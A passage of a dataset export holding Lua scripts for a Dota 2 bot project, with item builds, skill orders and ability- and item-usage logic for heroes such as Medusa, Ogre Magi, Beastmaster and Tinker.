salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\tlocal arcaneLoc = npcBot:FindItemSlot(\"item_arcane_boots\")\n\tlocal cycloneLoc = npcBot:FindItemSlot(\"item_cyclone\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(tangoLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\ttango = npcBot:GetItemInSlot(tangoLoc)\n\tend\n\tif npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsoul = npcBot:GetItemInSlot(soulLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\tif npcBot:GetItemSlotType(portalLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tportal = npcBot:GetItemInSlot(portalLoc)\n\tend\n\tif npcBot:GetItemSlotType(arcaneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tarcane = npcBot:GetItemInSlot(arcaneLoc)\n\tend\n\tif npcBot:GetItemSlotType(cycloneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tcyclone = npcBot:GetItemInSlot(cycloneLoc)\n\tend\n\t\n\tif bountyTopRadDist < 200 and bountyTopRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_1)\n\telseif bountyBotRadDist < 200 and bountyBotRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_2)\n\telseif bountyTopDirDist < 200 and bountyTopDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_3)\n\telseif bountyBotDirDist < 200 and bountyBotDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_4)\n\tend\n\t\n\t-- Drop Clarities and Salves if boots acquired\n\tif arcane ~= nil then\n\t\tif clarity ~= nil then\n\t\t\tnpcBot:Action_DropItem(clarity, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif salve ~= nil then\n\t\t\tnpcBot:Action_DropItem(salve, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif tango ~= nil then\n\t\t\tnpcBot:Action_DropItem(tango, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif portal ~= nil then\n\t\t\tnpcBot:Action_DropItem(portal, npcBot:GetLocation() + 
RandomVector(100))\n\t\tend\n\tend\n\t\n\tlocal baseMana = mine:GetManaCost()\n\tif remote:GetManaCost() > 0 then\n\t\tbaseMana = remote:GetManaCost()\n\tend\n\t\n\tif botMana < baseMana and not npcBot:HasModifier(\"modifier_clarity_potion\") and not npcBot:IsChanneling() then\n\t\tif arcane ~= nil and arcane:IsCooldownReady() then\n\t\t\tprint(\" Using ARCANE BOOTS\")\n \t\tnpcBot:Action_UseAbility(arcane)\n\t\telseif (bottle == nil and clarity ~= nil) or (bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n \telseif soul ~= nil and botHP/botMaxHP >= 0.4 and not npcBot:HasModifier(\"modifier_item_soul_ring\") and not npcBot:HasModifier(\"modifier_item_soul_ring_buff\") then\n \t\tnpcBot:Action_UseAbility(soul)\n \tend\n end\n \n\tif botHP/botMaxHP < 0.5 and not npcBot:IsChanneling() then\n\t\tif salve ~= nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(salve, npcBot)\n\t\telseif bottle ~= nil and bottle:GetCurrentCharges() > 0 and npcBot:DistanceFromFountain() ~= 0 then\n\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\telseif tango ~= nil and #nearbyTrees > 0 and not npcBot:HasModifier(\"modifier_tango_heal\") then\n\t\t\tnpcBot:Action_UseAbilityOnTree(tango, nearbyTrees[1])\n\t\tend\n\tend\n\n    -- Use courier if in inventory\n\tif courierLoc ~= nil then\n\t\tlocal courier = npcBot:GetItemInSlot(courierLoc)\n\t\tif courier ~= nil then\n\t\t\tnpcBot:Action_UseAbility(courier)\n\t\tend\n\tend\n\t\n\t-- Use bottle if mana is low\n\tif bottleLoc ~= nil and not npcBot:IsChanneling() then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\t\tbottleSlot = npcBot:GetItemSlotType(bottleLoc)\n\t\t\n\t\tif bottle ~= nil and botMana/botMaxMana < 0.3 then\n\t\t\tif bottle:GetCurrentCharges() > 0 then\n\t\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\t\tend\n\t\tend\n\tend\n\t\n\tif npcBot.other_mode == BOT_MODE_ROAM and npcBot:GetActiveMode() == BOT_MODE_RETREAT and cyclone ~= nil and table.getn(nearbyEnemies) > 0 then\n\t\tlocal enemy = nearbyEnemies[1]\n\t\t\n\t\tnpcBot:Action_UseAbilityOnEntity(cyclone, enemy)\n\tend\nend\n\nfunction getNearestCreep()\n\tlocal nearbyCreeps = npcBot:GetNearbyCreeps(500, true)\n\tif #nearbyCreeps > 0 then\n\t\tlocal nearestCreep = nil\n\t\tlocal nearestCreepDist = -50\n\t\tfor _, creep in pairs(nearbyCreeps) do\n\t\t\tlocal dist = GetUnitToUnitDistance(npcBot, creep)\n\t\t\tif nearestCreepDist == -50 then\n\t\t\t\tnearestCreepDist = dist\n\t\t\t\tnearestCreep = creep\n\t\t\telseif nearestCreepDist > dist then\n\t\t\t\tnearestCreepDist = dist\n\t\t\t\tnearestCreep = creep\n\t\t\tend\n\t\tend\n\t\treturn nearestCreep, nearestCreepDist\n\tend\n\treturn nil, nil\nend\n\nfunction getClosestLocation(bot)\n\tlocal closestDist = -50\n\tlocal closestLoc = nil\n\tlocal locsToUse = nil\n\tlocal radTowerCount = 0\n\tlocal dirTowerCount = 0\n\n\tfor _, towerID in pairs(_G.towers) do\n\t\t local tower = GetTower(_G.teams[1], towerID)\n\t\t if tower ~= nil then\n\t\t \tradTowerCount = radTowerCount + 1\n\t\t \t-- Maybe consider tower HP\n\t\t end\n\tend\n\tfor _, towerID in pairs(_G.towers) do\n\t\t local tower = GetTower(_G.teams[2], towerID)\n\t\t if tower ~= nil then\n\t\t \tdirTowerCount = dirTowerCount + 1\n\t\t \t-- Maybe consider tower HP\n\t\t end\n\tend\n\n\tfor _, loc in pairs(_G.rad_early_remote_locs) do\n\t\tlocal dist = GetUnitToLocationDistance(bot, loc)\n\t\tif closestDist == -50 then\n\t\t\tclosestDist = dist\n\t\t\tclosestLoc = 
loc\n\t\telse\n\t\t\tif dist < closestDist then\n\t\t\t\tclosestDist = dist\n\t\t\t\tclosestLoc = loc\n\t\t\tend\n\t\tend\n\tend\n\n\treturn closestDist, closestLoc\nend\n\nfunction getTeamObject(team, rad, dir)\n\tif team == _G.teams[1] then\n\t\treturn rad\n\telse\n\t\treturn dir\n\tend\nend\n"
},
{
"alpha_fraction": 0.5180356502532959,
"alphanum_fraction": 0.5614950060844421,
"avg_line_length": 25.45977020263672,
"blob_id": "fa742bb1553d3dd8f27dd5c449dedcffc4a0cd61",
"content_id": "cdcb03b77b4c7b40010e040d80784da0f367348b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2301,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 87,
"path": "/item_build_medusa.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n -- start --\n\t\"item_slippers\",\n \"item_circlet\",\n \"item_recipe_wraith_band\",\n \"item_tango\",\n -- ring of basilius --\n \"item_sobi_mask\",\n \"item_ring_of_protection\",\n -- phase boots --\n \"item_boots\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n -- mask of madness --\n \"item_lifesteal\",\n \"item_quarterstaff\",\n -- hurricane pike --\n \"item_ogre_axe\",\n \"item_boots_of_elves\",\n \"item_boots_of_elves\",\n \"item_staff_of_wizardry\",\n \"item_ring_of_health\",\n \"item_recipe_force_staff\",\n \"item_slippers\",\n \"item_circlet\",\n \"item_recipe_wraith_band\",\n -- eye of skadi --\n \"item_ultimate_orb\",\n \"item_point_booster\",\n \"item_ultimate_orb\",\n -- divine rapier --\n \"item_relic\",\n \"item_demon_edge\",\n}\n\nlocal split_shot = \"medusa_split_shot\"\nlocal mystic_snake = \"medusa_mystic_snake\"\nlocal mana_shield = \"medusa_mana_shield\"\nlocal stone_gaze = \"medusa_stone_gaze\"\n\nlocal talent_20_right = \"special_bonus_mp_700\"\nlocal talent_25_left = \"special_bonus_unique_medusa_4\"\n\nX[\"skills\"] = {\n mystic_snake, --1\n mana_shield, --2 \n mystic_snake, --3\n mana_shield, --4\n mystic_snake, --5\n split_shot, --6\n mystic_snake, --7\n split_shot, --8\n split_shot, --9\n talents[1], --10\n stone_gaze, --11\n split_shot, --12\n mana_shield, --13\n mana_shield, --14\n talents[3], --15\n stone_gaze, --16\n -- \"-1\", --17\n stone_gaze, --18\n -- \"-1\", --19\n talent_20_right, --20\n -- \"-1\", \t --21\n -- \"-1\", \t --22\n -- \"-1\", --23\n -- \"-1\", --24\n talent_25_left, --25\n}\n\n\n-- 7[VScript] 9\tspecial_bonus_unique_medusa_2\n-- 1[VScript] 10\tspecial_bonus_attack_damage_20\n-- 2[VScript] 11\tspecial_bonus_evasion_15\n-- 3[VScript] 12\tspecial_bonus_attack_speed_30\n-- 4[VScript] 13\tspecial_bonus_unique_medusa_3\n-- 5[VScript] 14\tspecial_bonus_mp_700\n-- 6[VScript] 15\tspecial_bonus_unique_medusa\n-- 7[VScript] 16\tspecial_bonus_unique_medusa_2\n-- 8[VScript] 17\tspecial_bonus_unique_medusa_4\nreturn X"
},
{
"alpha_fraction": 0.6198745965957642,
"alphanum_fraction": 0.629522442817688,
"avg_line_length": 25.9350643157959,
"blob_id": "8a3dfd5617a5d8fbd477494757a0f6f2167f926d",
"content_id": "7262cec979f3f29f8f07b335d33d0c425ed4aeaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2073,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 77,
"path": "/item_build_ogre_magi.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n \"item_orb_of_venom\",\n \"item_wind_lace\",\n \"item_boots\",\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n \"item_enchanted_mango\",\n \"item_energy_booster\",\n \"item_staff_of_wizardry\",\n \"item_ring_of_health\",\n \"item_recipe_force_staff\", -- sell orb ActionImmediate_SellItem(item)\n \"item_infused_raindrop\",\n \"item_circlet\",\n \"item_ring_of_protection\",\n \"item_recipe_urn_of_shadows\",-- drop TP Action_DropItem(item, location)\n \"item_shadow_amulet\",\n \"item_cloak\",\n \"item_vitality_booster\",\n \"item_recipe_spirit_vessel\",\n \"item_point_booster\",\n \"item_staff_of_wizardry\",\n \"item_ogre_axe\",\n \"item_blade_of_alacrity\", -- sell wand, disassemble arcane boots, unlock boots of speed ActionImmediate_SellItem(item), ActionImmediate_DisassembleItem(item), ActionImmediate_SetItemCombineLock(item, false)\n \"item_recipe_travel_boots\", -- unlock energy booster ActionImmediate_SetItemCombineLock(item, false)\n \"item_void_stone\",\n \"item_recipe_aether_lens\", -- sell glimmer cape ActionImmediate_SellItem(item)\n \"item_vitality_booster\",\n \"item_energy_booster\",\n \"item_recipe_aeon_disk\"\n}\n\nlocal fireblast = \"ogre_magi_fireblast\"\nlocal ignite = \"ogre_magi_ignite\"\nlocal bloodlust = \"ogre_magi_bloodlust\"\nlocal unblast = \"ogre_magi_unrefined_fireblast\"\nlocal multi = \"ogre_magi_multicast\"\n\nlocal t1 = \"special_bonus_gold_income_10\"\nlocal t2 = \"special_bonus_hp_300\"\nlocal t3 = \"special_bonus_unique_ogre_magi\"\nlocal t4 = \"special_bonus_unique_ogre_magi_2\"\n\nX[\"skills\"] = {\n ignite, \n fireblast, \n ignite, \n bloodlust, \n bloodlust,\n multi, \n bloodlust, \n ignite, \n ignite, \n t1,\n bloodlust, \n multi,\n fireblast,\n fireblast,\n t2,\n fireblast, \n \"-1\", \n multi,\n \"-1\", \t\n t3,\n \"-1\", \t\n \"-1\", \t\n \"-1\", \n \"-1\", \n t4\n}\n\nreturn X"
},
{
"alpha_fraction": 0.5813339948654175,
"alphanum_fraction": 0.5913829803466797,
"avg_line_length": 40.25388717651367,
"blob_id": "66f33937e6065f4826e7922766fb41430f75f6e5",
"content_id": "efc049805270424b99286011f3be0df96e8899b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 7961,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 193,
"path": "/ability_item_usage_beastmaster.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_beastmaster\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n\n local wild_axes = npcBot:GetAbilityByName(\"beastmaster_wild_axes\")\n local call_of_the_wild = npcBot:GetAbilityByName(\"beastmaster_call_of_the_wild\")\n local inner_beast = npcBot:GetAbilityByName(\"beastmaster_inner_beast\")\n local primal_roar = npcBot:GetAbilityByName(\"beastmaster_primal_roar\")\n\n local wild_axes_level = wild_axes:GetLevel()\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK then\n -- primal_roar think --\n if primal_roar ~= nil and primal_roar:IsFullyCastable() then\n action_mode = npcBot:GetActiveMode()\n if action_mode == 2 then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1200, true, BOT_MODE_NONE)\n local strongerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if strongerEnemy == nil then\n strongerEnemy = enemy\n else\n if enemy:GetRawOffensivePower() > strongerEnemy:GetRawOffensivePower() then\n strongerEnemy = enemy\n end\n end\n end\n\n print(\"Ability : Using Primal Roar\")\n npcBot:Action_UseAbilityOnEntity(primal_roar, strongerEnemy)\n end\n end\n \n -- wild_axes think --\n if wild_axes ~= nil and wild_axes:IsFullyCastable() and wild_axes_level >= 2 then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n local strongerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if strongerEnemy == nil then\n strongerEnemy = enemy\n else\n if enemy:GetRawOffensivePower() > strongerEnemy:GetRawOffensivePower() then\n strongerEnemy = enemy\n end\n end\n end\n\n if strongerEnemy ~= nil then\n if botTeam == 2 then\n local wildAxeLoc = _G.getVectorBetweenTargetPercentage(npcBot, strongerEnemy, 1.1)\n print(\"Ability : Using Wild Axe on \", wildAxeLoc)\n npcBot:Action_UseAbilityOnLocation(wild_axes, wildAxeLoc)\n else\n local wildAxeLoc = _G.getVectorBetweenTargetPercentage(strongerEnemy, npcBot, 1.1)\n print(\"Ability : Using Wild Axe on \", wildAxeLoc)\n npcBot:Action_UseAbilityOnLocation(wild_axes, wildAxeLoc)\n end\n else\n action_mode = npcBot:GetActiveMode()\n if action_mode == BOT_MODE_FARM then\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n if #nearbyCreeps >= 3 then\n if botTeam == 2 then\n local wildAxeLoc = _G.getVectorBetweenTargetPercentage(npcBot, nearbyCreeps[3], 1.1)\n print(\"Ability : Using Wild Axe on \", wildAxeLoc)\n npcBot:ActionQueue_UseAbilityOnLocation(wild_axes, wildAxeLoc)\n else\n local wildAxeLoc = _G.getVectorBetweenTargetPercentage(nearbyCreeps[3], npcBot, 1.1)\n print(\"Ability : Using Wild Axe on \", wildAxeLoc)\n npcBot:ActionQueue_UseAbilityOnLocation(wild_axes, wildAxeLoc)\n end\n end\n end\n end\n 
-- wildAxeLoc = {bot_location_x+400, bot_location_y+400}\n -- print(npcBot:GetLocation())\n -- npcBot:Action_UseAbilityOnLocation(wild_axes, npcBot:GetLocation())\n end\n\n -- call_of_the_wild think -- \n if call_of_the_wild ~= nil and call_of_the_wild:IsFullyCastable() then\n npcBot:Action_UseAbility(call_of_the_wild)\n print(\"Ability : Using call of wild\")\n end\n end\nend\n\n-- function ItemUsageThink()\n-- local clarity = nil\n-- local soul = nil\n-- local necro1 = nil\n-- local necro2 = nil\n-- local necro3 = nil\n\n-- local clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n-- local soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n-- local necro1Loc = npcBot:FindItemSlot(\"item_necronomicon_1\")\n-- local necro2Loc = npcBot:FindItemSlot(\"item_necronomicon_2\")\n-- local necro3Loc = npcBot:FindItemSlot(\"item_necronomicon_3\")\n\n-- if npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n-- \tend\n-- if npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tsoul = npcBot:GetItemInSlot(soulLoc)\n-- \tend\n-- if npcBot:GetItemSlotType(necro1Loc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tclarity = npcBot:GetItemInSlot(necro1Loc)\n-- \tend\n-- if npcBot:GetItemSlotType(necro2Loc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tclarity = npcBot:GetItemInSlot(necro2Loc)\n-- \tend\n-- if npcBot:GetItemSlotType(necro3Loc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tclarity = npcBot:GetItemInSlot(necro3Loc)\n-- \tend\n\n-- local action_mode = npcBot:GetActiveMode()\n\n-- local botMana = npcBot:GetMana()\n-- \tlocal botMaxMana = npcBot:GetMaxMana()\n-- if botMana/botMaxMana < 0.4 and not npcBot:HasModifier(\"modifier_clarity_potion\") then\n-- \t\tif (bottle == nil and clarity ~= nil) or (bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n-- \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n-- \telseif soul ~= nil then\n-- \t\tnpcBot:Action_UseAbility(soul)\n-- \tend\n-- end\n\n-- -- if action_mode == BOT_MODE_PUSH_TOWER_TOP or action_mode == BOT_MODE_PUSH_TOWER_MID or BOT_MODE_PUSH_TOWER_MID == BOT_MODE_PUSH_TOWER_BOT or action_mode == BOT_MODE_ATTACK then\n-- if necro1Loc ~= nil then\n-- local necro1 = npcBot:GetItemInSlot(necro1Loc)\n-- if necro1 ~= nil then\n-- npcBot:Action_UseAbility(necro1)\n-- end\n-- end\n \n-- if necro2Loc ~= nil then\n-- local necro2 = npcBot:GetItemInSlot(necro2Loc)\n-- if necro2 ~= nil then\n-- npcBot:Action_UseAbility(necro2)\n-- end\n-- end\n\n-- if necro3Loc ~= nil then\n-- local necro3 = npcBot:GetItemInSlot(necro3Loc)\n-- if necro3 ~= nil then\n-- npcBot:Action_UseAbility(necro3)\n-- end\n-- end\n-- -- end\n \n-- end\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
{
"alpha_fraction": 0.7083333134651184,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 14.666666984558105,
"blob_id": "1fb6ef6bb6e90b995a07b8f1b998e7edd3475636",
"content_id": "e39cadccc78d9433a399e1e0710a7df8acb8b0c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 3,
"path": "/mode_push_tower_top_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "\nfunction GetDesire()\n\treturn _G.desires[0]\nend\n"
},
{
"alpha_fraction": 0.7245556712150574,
"alphanum_fraction": 0.7341786623001099,
"avg_line_length": 38.26222229003906,
"blob_id": "0bde3419070874fd32e90bae60072b87dfe7019a",
"content_id": "abf036a218c11b26b8dc9e6e11359112b128e5a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 8833,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 225,
"path": "/ability_item_usage_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_tinker\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botHealth = npcBot:GetHealth()\n\tlocal botHPRegen = npcBot:GetHealthRegen()\n\tlocal botManaRegen = npcBot:GetManaRegen()\n\tlocal level = npcBot:GetLevel()\n\tlocal blinkDagger = npcBot:FindItemSlot(\"item_blink\")\n\tlocal travelBoots = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal currentGold = npcBot:GetGold()\n\tlocal activeMode = npcBot:GetActiveMode()\n\t\n\tlocal towerStatusTopRad = _G.GetTowerStatus(\"top\", TEAM_RADIANT)\n\tlocal towerStatusMidRad = _G.GetTowerStatus(\"mid\", TEAM_RADIANT)\n\tlocal towerStatusBotRad = _G.GetTowerStatus(\"bot\", TEAM_RADIANT)\n\tlocal towerStatusTopDir = _G.GetTowerStatus(\"top\", TEAM_DIRE)\n\tlocal towerStatusMidDir = _G.GetTowerStatus(\"mid\", TEAM_DIRE)\n\tlocal towerStatusBotDir = _G.GetTowerStatus(\"bot\", TEAM_DIRE)\n\t\n\tlocal creepLaneTopRad = _G.GetLaneCreepStatus(LANE_TOP, TEAM_RADIANT)\n\tlocal creepLaneMidRad = _G.GetLaneCreepStatus(LANE_MID, TEAM_RADIANT)\n\tlocal creepLaneBotRad = _G.GetLaneCreepStatus(LANE_BOT, TEAM_RADIANT)\n\tlocal creepLaneTopDir = _G.GetLaneCreepStatus(LANE_TOP, TEAM_DIRE)\n\tlocal creepLaneMidDir = _G.GetLaneCreepStatus(LANE_MID, TEAM_DIRE)\n\tlocal creepLaneBotDir = _G.GetLaneCreepStatus(LANE_BOT, TEAM_DIRE)\n\t\n\tlocal laser = npcBot:GetAbilityByName(\"tinker_laser\")\n\tlocal missile = npcBot:GetAbilityByName(\"tinker_heat_seeking_missile\")\n\tlocal march = npcBot:GetAbilityByName(\"tinker_march_of_the_machines\")\n\tlocal rearm = npcBot:GetAbilityByName(\"tinker_rearm\")\n\t\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(650, true, BOT_MODE_NONE)\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_ATTACK then\n \tlocal nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n \tlocal lowestHPCreep = nil\n \t\n \tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n \tlocal nearestEnemy = nil\n \t\n \tfor k,enemy in pairs(nearbyEnemies) do\n \t\tif nearestEnemy == nil then\n \t\t\tnearestEnemy = enemy\n \t\telse\n \t\t\tif GetUnitToUnitDistance(nearestEnemy, npcBot) > GetUnitToUnitDistance(enemy, npcBot) then\n \t\t\t\tnearestEnemy = enemy\n \t\t\tend\n \t\tend\n \tend\n \t\n \tif not npcBot:IsChanneling() then\n \t\tif botMana >= (march:GetManaCost() + laser:GetManaCost()) and laser:IsFullyCastable() and nearestEnemy ~= nil then\n \t\t\tnpcBot:Action_UseAbilityOnEntity(laser, nearestEnemy)\n \t\tend\n \t\tif march:IsFullyCastable() and #nearbyCreeps >= 3 
and activeMode ~= BOT_MODE_FARM then\n \t\t\tlocal marchLoc = _G.getVectorBetweenTargetPercentage(npcBot, nearbyCreeps[1], 0.8)\n \t\t\tnpcBot:Action_UseAbilityOnLocation(march, _G.getAnglePoint(botLoc, marchLoc, 25))\n \t\tend\n \tend\n \t\n\t\t-- Use Missile if enemy nearby\n \tif not npcBot:IsChanneling() and missile ~= nil and missile:IsFullyCastable() and #nearbyEnemies > 0 then\n \t\tnpcBot:Action_UseAbility(missile)\n \tend\n end\nend\n\nfunction ItemUsageThink()\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal bottle = nil\n\tlocal bottleSlot = nil\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\t\n\tlocal nearbyTrees = npcBot:GetNearbyTrees(1600)\n\t\n\tlocal bountyTopRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_1)\n\tlocal bountyBotRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_2)\n\tlocal bountyTopDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_3)\n\tlocal bountyBotDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_4)\n\t\n\tlocal bountyTopRadDist = GetUnitToLocationDistance(npcBot, bountyTopRadLoc)\n\tlocal bountyBotRadDist = GetUnitToLocationDistance(npcBot, bountyBotRadLoc)\n\tlocal bountyTopDirDist = GetUnitToLocationDistance(npcBot, bountyTopDirLoc)\n\tlocal bountyBotDirDist = GetUnitToLocationDistance(npcBot, bountyBotDirLoc)\n\t\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal tango = nil\n\tlocal soul = nil\n\tlocal boots = nil\n\tlocal portal = nil\n\t\n\tlocal courierLoc = npcBot:FindItemSlot(\"item_courier\")\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == 